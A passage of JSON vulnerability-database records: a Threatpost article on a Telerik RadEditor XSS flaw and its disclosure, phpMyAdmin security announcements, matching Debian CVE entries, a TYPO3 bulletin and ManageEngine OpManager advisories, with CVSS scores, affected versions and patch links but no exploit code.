"https://wpscan.com/vulnerability/17401705-5f44-47d6-920e-ec058d426114", "type": "wpvulndb", "title": "EWWW Image Optimizer 2.0.1 - Cross-Site Scripting (XSS)", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:04", "bulletinFamily": "info", "cvelist": ["CVE-2014-4958"], "description": "All versions of an HTML editor used in several Microsoft technologies, including ASP.NET, suffer from a high-risk cross-site scripting (XSS) vulnerability that could allow an attacker to inject malicious script and glean private information.\n\nThe problem exists in all versions of RadEditor, a WYSIWYG text editor manufactured by Bulgaria-based firm Telerik, according to security researcher G.S. McNamara, who disclosed the vulnerability on [his blog late last week](<http://maverickblogging.com/disclosing-cve-2014-4958-stored-attribute-based-cross-site-scripting-xss-vulnerability-in-telerik-ui-for-asp-net-ajax-radeditor-control/>).\n\n\u201cTechnically speaking, this is a massive hole in how existing input validation security filters work in unison,\u201d McNamara said in an email Thursday to Threatpost regarding the vulnerability.\n\nThe editor, which allows users to input rich-text, is used to varying degrees in Microsoft products like [MSDN, CodePlex, TechNet, and MCMS, along with some Sharepoint and ASP.NET implementations](<http://demos.telerik.com/aspnet-ajax/editor/examples/overview/defaultcs.aspx>).\n\n\u201cIt\u2019s a silent killer, too, because at least one commercial penetration-testing tool failed to find it\u201d McNamara said, \u201cYou just get a false negative.\u201d\n\nMcNamara initially found the vulnerability (CVE-2014-4958) in a 2009 version (2009.3.1208.20) of the product on Internet Explorer along with a 2014 version but suggests it could have existed in previous iterations of the editor.\n\n\u201cI just had a hunch and followed it obsessively, manually,\u201d McNamara said of his 
search for the bug, which he first dug up on July 9.\n\nFrom there it took about two months of going back and forth with the company.\n\nWhen he first contacted Telerik\u2019s Customer Support department, it insisted the bug had already been fixed. To prove his case McNamara forwarded the company his exploit code. When Telerik still wouldn\u2019t put him in touch with anyone in charge of security, McNamara ultimately had to go through what he calls \u201cunofficial channels,\u201d by sending a personal email to a Telerik employee\u2019s Gmail account in late August, to finally get the ball rolling.\n\nIt wasn\u2019t until earlier this month that the researcher and the company agreed to coordinate a disclosure. Yet after two weeks of radio silence from Telerik \u2013 McNamara claims he made multiple phone calls, emails, requests to high-level account managers \u2013 he decided to disclose the bug independently \u2014 only to have the company release its information \u201cout of the blue,\u201d hours before he was planning on releasing his, last Wednesday.\n\n\u201cResolving this politely was tough,\u201d McNamara admits, claiming the issue lasted as long as it did due to a lapse in responsibility.\n\n\u201cThis is a technical product sold to technical developers, and Telerik wanted the developers to share the responsibility of security. The developers probably didn\u2019t know that,\u201d McNamara said.\n\nWhile RadEditor\u2019s filters cover some attack vectors \u2013 namely the RemoveScripts filter to strip out script tags \u2013 the attack technique that McNamara used \u201cis not your typical XSS.\u201d\n\n\u201cBy using lesser-known attacks I found a way through,\u201d McNamara said, adding that he put to use some old research by WhiteHat Security\u2019s Jeremiah Grossman to help dig up the vulnerability.\n\nSpecifically the vulnerability employs attribute-based cross-site scripting without relying on JavaScript tags. 
It\u2019s also harder to detect because the web editor has to process many different obfuscated elements, notably dynamic properties like CSS Expressions, used in older builds of IE, in addition to JavaScript.\n\nIn a blog entry Telerik [posted on Wednesday](<http://blogs.telerik.com/blogs/14-09-24/securing-radeditor-content-and-preventing-xss-attacks>) the company addressed the issue and gave credit to McNamara but stood pat on its stance that the responsibility of sanitizing content to prevent threats should fall to the developer.\n\n\u201cIt is always the duty of the developer to implement the necessary content validation,\u201d Nikodim Lazarov, one of the company\u2019s senior software developers wrote.\n\nThe company is slated to push out a patch for the issue but not until it updates the Q3 edition of its controls, in late October. In the meantime Telerik is [giving users a workaround](<http://feedback.telerik.com/Project/108/Feedback/Details/137364-prevent-possible-xss-attack-in-radeditor-using-malicious-content-in-ie>) that it\u2019s strongly recommending users follow until its patch is pushed.\n\nMcNamara, who works as an application security engineer at the IT services provider CGI, says that he\u2019s planning to do further research in his spare time on other rich text editors like RadEditor to see if he can find similar problems.\n\n\u201cMost of the company\u2019s user base is likely unaware that they silently integrated a high-risk vulnerability into their site,\u201d McNamara says of the bug in closing, \u201cSystem owners signed off on this without knowing.\u201d\n", "modified": "2014-10-01T19:22:03", "published": "2014-09-29T12:15:03", "id": "THREATPOST:DDF98CD337434196370FDCA7D39C0ED0", "href": "https://threatpost.com/radeditor-web-editor-vulnerable-to-xss-attacks/108594/", "type": "threatpost", "title": "Web Editor Vulnerable To XSS Attacks", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "phpmyadmin": 
[{"lastseen": "2021-07-28T14:34:08", "description": "## PMASA-2014-10\n\n**Announcement-ID:** PMASA-2014-10\n\n**Date:** 2014-09-13\n\n### Summary\n\nXSRF/CSRF due to DOM based XSS in the micro history feature\n\n### Description\n\nBy deceiving a logged-in user to click on a crafted URL, it is possible to perform remote code execution and in some cases, create a root account due to a DOM based XSS vulnerability in the micro history feature.\n\n### Severity\n\nWe consider this vulnerability to be critical.\n\n### Affected Versions\n\nVersions 4.0.x (prior to 4.0.10.3), 4.1.x (prior to 4.1.14.4) and 4.2.x (prior to 4.2.8.1) are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.0.10.3 or newer, or 4.1.14.4 or newer, or 4.2.8.1 or newer, or apply the patches listed below.\n\n### References\n\nThanks to Olivier Beg (<http://www.olivierbeg.nl>) for reporting the vulnerability.\n\nAssigned CVE ids: [CVE-2014-6300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6300>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-352](<https://cwe.mitre.org/data/definitions/352.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [33b39f9f1dd9a4d27856530e5ac004e23b30e8ac](<https://github.com/phpmyadmin/phpmyadmin/commit/33b39f9f1dd9a4d27856530e5ac004e23b30e8ac>)\n\nThe following commits have been made on the 4.0 branch to fix this issue:\n\n * [ab0dba4533f1d01dde43c1864413478c921cfe6b](<https://github.com/phpmyadmin/phpmyadmin/commit/ab0dba4533f1d01dde43c1864413478c921cfe6b>)\n\nThe following commits have been made on the 4.1 branch to fix this issue:\n\n * [621772aa0d19d5f3ac21af2611c1dbda9b356506](<https://github.com/phpmyadmin/phpmyadmin/commit/621772aa0d19d5f3ac21af2611c1dbda9b356506>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). 
\n", "cvss3": {}, "published": "2014-09-13T00:00:00", "type": "phpmyadmin", "title": "XSRF/CSRF due to DOM based XSS in the micro history feature", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-09-13T00:00:00", "id": "PHPMYADMIN:PMASA-2014-10", "href": "https://www.phpmyadmin.net/security/PMASA-2014-10/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-28T14:34:08", "description": "## PMASA-2014-11\n\n**Announcement-ID:** PMASA-2014-11\n\n**Date:** 2014-10-01\n\n### Summary\n\nXSS vulnerabilities in table search and table structure pages.\n\n### Description\n\nWith a crafted ENUM value it is possible to trigger an XSS in table search and table structure pages.\n\n### Severity\n\nWe consider this vulnerability to be non critical.\n\n### Mitigation factor\n\nThis vulnerability can be triggered only by someone who is logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required pages.\n\n### Affected Versions\n\nVersions 4.0.x (prior to 4.0.10.4), 4.1.x (prior to 4.1.14.5) and 4.2.x (prior to 4.2.9.1) are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.0.10.4 or newer, or 4.1.14.5 or newer, or 4.2.9.1 or newer, or apply the patch listed below.\n\n### References\n\nThanks to Ashutosh Dhundhara for reporting this vulnerability.\n\nAssigned CVE ids: [CVE-2014-7217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7217>)\n\nCWE ids: 
[CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [c1a3f85fbd1a9569646e7cf1b791325ae82c7961](<https://github.com/phpmyadmin/phpmyadmin/commit/c1a3f85fbd1a9569646e7cf1b791325ae82c7961>)\n * [304fb2b645b36a39e03b954fdbd567173ebe6448](<https://github.com/phpmyadmin/phpmyadmin/commit/304fb2b645b36a39e03b954fdbd567173ebe6448>)\n\nThe following commits have been made on the 4.0 branch to fix this issue:\n\n * [c6c77589a5860f20b5fb335033389de50e1a9031](<https://github.com/phpmyadmin/phpmyadmin/commit/c6c77589a5860f20b5fb335033389de50e1a9031>)\n\nThe following commits have been made on the 4.1 branch to fix this issue:\n\n * [71ccbbc423bcfd14ba40174b3adcd9a0fafaa511](<https://github.com/phpmyadmin/phpmyadmin/commit/71ccbbc423bcfd14ba40174b3adcd9a0fafaa511>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). 
\n", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "phpmyadmin", "title": "XSS vulnerabilities in table search and table structure pages.", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-01T00:00:00", "id": "PHPMYADMIN:PMASA-2014-11", "href": "https://www.phpmyadmin.net/security/PMASA-2014-11/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-07-28T14:34:04", "description": "## PMASA-2014-7\n\n**Announcement-ID:** PMASA-2014-7\n\n**Date:** 2014-07-17\n\n### Summary\n\nAccess for an unprivileged user to MySQL user list.\n\n### Description\n\nAn unprivileged user could view the MySQL user list and manipulate the tabs displayed in phpMyAdmin for them.\n\n### Severity\n\nWe consider this vulnerability to be non critical.\n\n### Mitigation factor\n\nThis vulnerability can be triggered only by someone who is logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required pages. 
Moreover, the configuration storage must be set up for the user groups feature.\n\n### Affected Versions\n\nVersions 4.1.x (prior to 4.1.14.2) and 4.2.x (prior to 4.2.6) are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.1.14.2 or newer, or 4.2.6 or newer, or apply the patch listed below.\n\n### References\n\nThanks to Chirayu Chiripal for reporting this vulnerability.\n\nAssigned CVE ids: [CVE-2014-4987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4987>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [395265e9937beb21134626c01a21f44b28e712e5](<https://github.com/phpmyadmin/phpmyadmin/commit/395265e9937beb21134626c01a21f44b28e712e5>)\n\nThe following commits have been made on the 4.1 branch to fix this issue:\n\n * [45550b8cff06ad128129020762f9b53d125a6934](<https://github.com/phpmyadmin/phpmyadmin/commit/45550b8cff06ad128129020762f9b53d125a6934>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). 
\n", "cvss3": {}, "published": "2014-07-17T00:00:00", "type": "phpmyadmin", "title": "Access for an unprivileged user to MySQL user list.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4987"], "modified": "2014-07-17T00:00:00", "id": "PHPMYADMIN:PMASA-2014-7", "href": "https://www.phpmyadmin.net/security/PMASA-2014-7/", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:33:58", "description": "## PMASA-2014-6\n\n**Announcement-ID:** PMASA-2014-6\n\n**Date:** 2014-07-17\n\n### Summary\n\nMultiple XSS in AJAX confirmation messages.\n\n### Description\n\nWith a crafted column name it is possible to trigger an XSS when dropping the column in table structure page. 
With a crafted table name it is possible to trigger an XSS when dropping or truncating the table in table operations page.\n\n### Severity\n\nWe consider this vulnerability to be non critical.\n\n### Mitigation factor\n\nThis vulnerability can be triggered only by someone who is logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required pages.\n\n### Affected Versions\n\nVersions 4.0.x (prior to 4.0.10.1), 4.1.x (prior to 4.1.14.2) and 4.2.x (prior to 4.2.6) are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.0.10.1 or newer, or 4.1.14.2 or newer, or 4.2.6 or newer, or apply the patch listed below.\n\n### References\n\nAssigned CVE ids: [CVE-2014-4986](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4986>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [29a1f56495a7d1d98da31a614f23c0819a606a4d](<https://github.com/phpmyadmin/phpmyadmin/commit/29a1f56495a7d1d98da31a614f23c0819a606a4d>)\n\nThe following commits have been made on the 4.0 branch to fix this issue:\n\n * [a92753bd65e1f8b72c46ed3dda6c362628e0daf7](<https://github.com/phpmyadmin/phpmyadmin/commit/a92753bd65e1f8b72c46ed3dda6c362628e0daf7>)\n\nThe following commits have been made on the 4.1 branch to fix this issue:\n\n * [cd5697027a2ee7e1f7d7000b23be6051cdb0516c](<https://github.com/phpmyadmin/phpmyadmin/commit/cd5697027a2ee7e1f7d7000b23be6051cdb0516c>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). 
\n", "cvss3": {}, "published": "2014-07-17T00:00:00", "type": "phpmyadmin", "title": "Multiple XSS in AJAX confirmation messages.", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4986"], "modified": "2014-07-17T00:00:00", "id": "PHPMYADMIN:PMASA-2014-6", "href": "https://www.phpmyadmin.net/security/PMASA-2014-6/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-07-28T14:34:06", "description": "## PMASA-2014-3\n\n**Announcement-ID:** PMASA-2014-3\n\n**Date:** 2014-06-20\n\n### Summary\n\nSelf-XSS due to unescaped HTML output in navigation items hiding feature.\n\n### Description\n\nWhen hiding or unhiding a crafted table name in the navigation, it is possible to trigger an XSS.\n\n### Severity\n\nWe consider this vulnerability to be non critical.\n\n### Mitigation factor\n\nThis vulnerability can be triggered only by someone who is logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required form.\n\n### Affected Versions\n\nVersions 4.1.x (prior to 4.1.14.1) and 4.2.x (prior to 4.2.4) are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.1.14.1 or newer, or 4.2.4 or newer, or apply the patch listed below.\n\n### References\n\nThanks to Chirayu Chiripal for reporting this vulnerability.\n\nAssigned CVE ids: [CVE-2014-4349](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4349>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) 
[CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [d4f754c937f9e2c0beadff5b2e38215dde1d6a79](<https://github.com/phpmyadmin/phpmyadmin/commit/d4f754c937f9e2c0beadff5b2e38215dde1d6a79>)\n\nThe following commits have been made on the 4.1 branch to fix this issue:\n\n * [daa98d0c7ed24b529dc5df0d5905873acd0b00be](<https://github.com/phpmyadmin/phpmyadmin/commit/daa98d0c7ed24b529dc5df0d5905873acd0b00be>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "cvss3": {}, "published": "2014-06-20T00:00:00", "type": "phpmyadmin", "title": "Self-XSS due to unescaped HTML output in navigation items hiding feature.", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4349"], "modified": "2014-06-20T00:00:00", "id": "PHPMYADMIN:PMASA-2014-3", "href": "https://www.phpmyadmin.net/security/PMASA-2014-3/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "debiancve": [{"lastseen": "2022-07-09T17:35:19", "description": "Cross-site scripting (XSS) vulnerability in the micro history implementation in phpMyAdmin 4.0.x before 4.0.10.3, 4.1.x before 4.1.14.4, and 4.2.x before 4.2.8.1 allows remote attackers to inject arbitrary web script or HTML, and consequently conduct a cross-site request forgery (CSRF) attack to create a root account, via a crafted URL, related to js/ajax.js.", "cvss3": 
{}, "published": "2014-11-08T11:55:00", "type": "debiancve", "title": "CVE-2014-6300", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-11-08T11:55:00", "id": "DEBIANCVE:CVE-2014-6300", "href": "https://security-tracker.debian.org/tracker/CVE-2014-6300", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-09T17:35:19", "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.0.x before 4.0.10.4, 4.1.x before 4.1.14.5, and 4.2.x before 4.2.9.1 allow remote authenticated users to inject arbitrary web script or HTML via a crafted ENUM value that is improperly handled during rendering of the (1) table search or (2) table structure page, related to libraries/TableSearch.class.php and libraries/Util.class.php.", "cvss3": {}, "published": "2014-10-03T01:55:00", "type": "debiancve", "title": "CVE-2014-7217", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-03T01:55:00", "id": "DEBIANCVE:CVE-2014-7217", "href": 
"https://security-tracker.debian.org/tracker/CVE-2014-7217", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-07-09T17:35:19", "description": "server_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x before 4.2.6 allows remote authenticated users to bypass intended access restrictions and read the MySQL user list via a viewUsers request.", "cvss3": {}, "published": "2014-07-20T11:12:00", "type": "debiancve", "title": "CVE-2014-4987", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4987"], "modified": "2014-07-20T11:12:00", "id": "DEBIANCVE:CVE-2014-4987", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4987", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-07-09T17:35:19", "description": "Multiple cross-site scripting (XSS) vulnerabilities in js/functions.js in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allow remote authenticated users to inject arbitrary web script or HTML via a crafted (1) table name or (2) column name that is improperly handled during construction of an AJAX confirmation message.", "cvss3": {}, "published": "2014-07-20T11:12:00", "type": "debiancve", "title": "CVE-2014-4986", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": 
"NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4986"], "modified": "2014-07-20T11:12:00", "id": "DEBIANCVE:CVE-2014-4986", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4986", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-07-09T17:35:19", "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x before 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated users to inject arbitrary web script or HTML via a crafted table name that is improperly handled after a (1) hide or (2) unhide action.", "cvss3": {}, "published": "2014-06-25T11:19:00", "type": "debiancve", "title": "CVE-2014-4349", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4349"], "modified": "2014-06-25T11:19:00", "id": "DEBIANCVE:CVE-2014-4349", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4349", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "typo3": [{"lastseen": "2016-09-28T15:30:19", "description": "It has been discovered that the extension \"phpMyAdmin\" (phpmyadmin) is susceptible to Cross-Site Scripting.\n\n**Release Date:** November 5, 2014\n\n**Component Type:** Third party extension. 
This extension is not a part of the TYPO3 default installation.\n\n**Affected Versions:** 4.18.0, 4.18.1, 4.18.2 and 4.18.3\n\n**Vulnerability Type:** XSS\n\n**Severity:** Low\n\n**Suggested CVSS v2.0:** AV:N/AC:H/Au:S/C:P/I:P/A:N/E:ND/RL:O/RC:C\n\n**References:** [PMASA-2014-11](<http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php>)\n\n**Related CVE:** CVE-2014-7217\n\n**Problem Description:** Crafted database content can trigger XSS in table search and table structure pages.\n\n**Solution:** An updated version 4.18.4 is available from the TYPO3 extension manager and at <http://typo3.org/extensions/repository/download/phpmyadmin/4.18.4/t3x/>. Users of the extension are advised to update the extension as soon as possible.\n\n**Credits:** The vendor of the phpMyAdmin upstream software credits Ashutosh Dhundhara. Thanks to Andreas Beutel for providing a TYPO3 extension package with an updated phpMyAdmin version.\n\n**General advice:** Follow the recommendations that are given in the [TYPO3 Security Guide](<http://docs.typo3.org/typo3cms/SecurityGuide/> \"Initiates file download\" ). 
Please subscribe to the [typo3-announce mailing list](<http://lists.typo3.org/cgi-bin/mailman/listinfo/typo3-announce> \"Opens external link in new window\" ) to receive future Security Bulletins via E-mail.\n", "cvss3": {}, "published": "2014-11-05T00:00:00", "type": "typo3", "title": "Cross-Site Scripting vulnerability in extension phpMyAdmin (phpmyadmin)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2014-11-05T00:00:00", "id": "TYPO3-EXT-SA-2014-016", "href": "https://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2014-016/", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "zdi": [{"lastseen": "2022-01-31T21:14:33", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the FileCollector servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. 
An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager FileCollector FILENAME File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6034"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-143", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-143/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-31T21:14:59", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the MultipartRequestServlet servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. 
An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-03T00:00:00", "type": "zdi", "title": "ManageEngine OpManager MultipartRequestServlet filename File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6036"], "modified": "2015-04-03T00:00:00", "id": "ZDI-15-113", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-113/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:34", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the AgentDataHandler class. The issue lies in the failure to sanitize the filenames uploaded to the servlet. 
